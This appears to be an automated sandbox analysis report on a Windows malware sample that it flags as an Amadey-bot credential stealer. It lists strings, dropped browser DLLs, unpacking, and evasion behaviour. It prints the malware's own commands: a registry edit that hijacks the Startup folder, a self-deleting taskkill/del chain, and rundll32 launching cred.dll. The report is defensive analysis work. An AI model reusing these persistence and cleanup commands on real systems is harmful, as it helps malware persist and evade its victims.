                              Source: blfte.exe, 0000000A.00000002.923945938.00000000006B5000.00000004.00000001.sdmpString found in binary or memory: https:///Hnq8vS/index.php
                              Source: temp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/Gu
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/Nu
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/core/v1/nicknames/sslamlssa
                              Source: temp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                              Source: temp.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                              Source: temp.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700263265.000000000085B000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmp, softokn3[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701191572.0000000003048000.00000004.00000001.sdmp, temp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: unknown HTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700205430.00000000007EA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                              Source: wKYTg7Gp6P.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                              Source: xsrv2[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: M7WCJ84VE5TXJ0R4.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: blfte.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700521100.0000000002460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701283125.0000000003110000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700586635.00000000024B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.668255805.0000000002C8B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700435340.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701719719.0000000003500000.00000002.00000001.sdmpBinary or memory string: originalfilename vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701719719.0000000003500000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701448741.0000000003300000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: wKYTg7Gp6P.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@21/30@2/6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040C26E _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,FindCloseChangeNotification,0_2_0040C26E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040A91B __EH_prolog3,InternetSetFilePointer,InternetReadFile,_memmove,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,0_2_0040A91B
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3028:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeFile created: C:\Users\user\AppData\Local\Temp\15213853321935212556
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCommand line argument: -B5_2_00422D40
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCommand line argument: -B10_2_00422D40
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wKYTg7Gp6P.exe")
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                              Source: softokn3[1].dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: softokn3[1].dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL id FROM %s;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                              Source: wKYTg7Gp6P.exeVirustotal: Detection: 48%
                              Source: wKYTg7Gp6P.exeReversingLabs: Detection: 58%
                              Source: unknownProcess created: C:\Users\user\Desktop\wKYTg7Gp6P.exe 'C:\Users\user\Desktop\wKYTg7Gp6P.exe'
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe'
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe'
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
                              Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
                              Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
                              Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr

                              Data Obfuscation:

                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack .text:ER;.data:W;.mijoza:W;.tls:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                              Detected unpacking (overwrites its own PE header)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040EBA8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,0_2_0040EBA8
                              Source: wKYTg7Gp6P.exeStatic PE information: section name: .mijoza
                              Source: wKYTg7Gp6P.exeStatic PE information: section name: .new
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E67A pushad ; retn 0048h0_2_0047E680
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E685 pushad ; retn 0048h0_2_0047E68B
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E690 pushad ; retn 0048h0_2_0047E696
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F4E6 push ecx; ret 5_2_0040F4F9
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0042AD75 push esi; ret 5_2_0042AD7E
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040F4E6 push ecx; ret 10_2_0040F4F9
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0042AD75 push esi; ret 10_2_0042AD7E
                              Source: initial sampleStatic PE information: section name: .text entropy: 7.88074668674

                              Persistence and Installation Behavior:

                              Yara detected Amadey bot
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: blfte.exe PID: 5756, type: MEMORY
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\mozglue.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\nss3.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\vcruntime140[1].dll
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeFile created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\mozglue[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\msvcp140.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\freebl3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\softokn3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\freebl3.dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\scr.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\vcruntime140.dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\cred.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nss3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\softokn3.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe

                              Boot Survival:

                              Creates an undocumented autostart registry key
                              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

                              Hooking and other Techniques for Hiding and Protection:

                              Creates files in alternative data streams (ADS)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe:Zone.Identifier
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045F4A8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0045F4A8
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\vcruntime140[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\mozglue[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\freebl3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\softokn3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\ProgramData\1a9f26b569d5df\scr.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nss3[1].dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                              Source: C:\Windows\SysWOW64\timeout.exe TID: 5720 Thread sleep count: 52 > 30
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 4864 Thread sleep time: -330000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680 Thread sleep count: 227 > 30
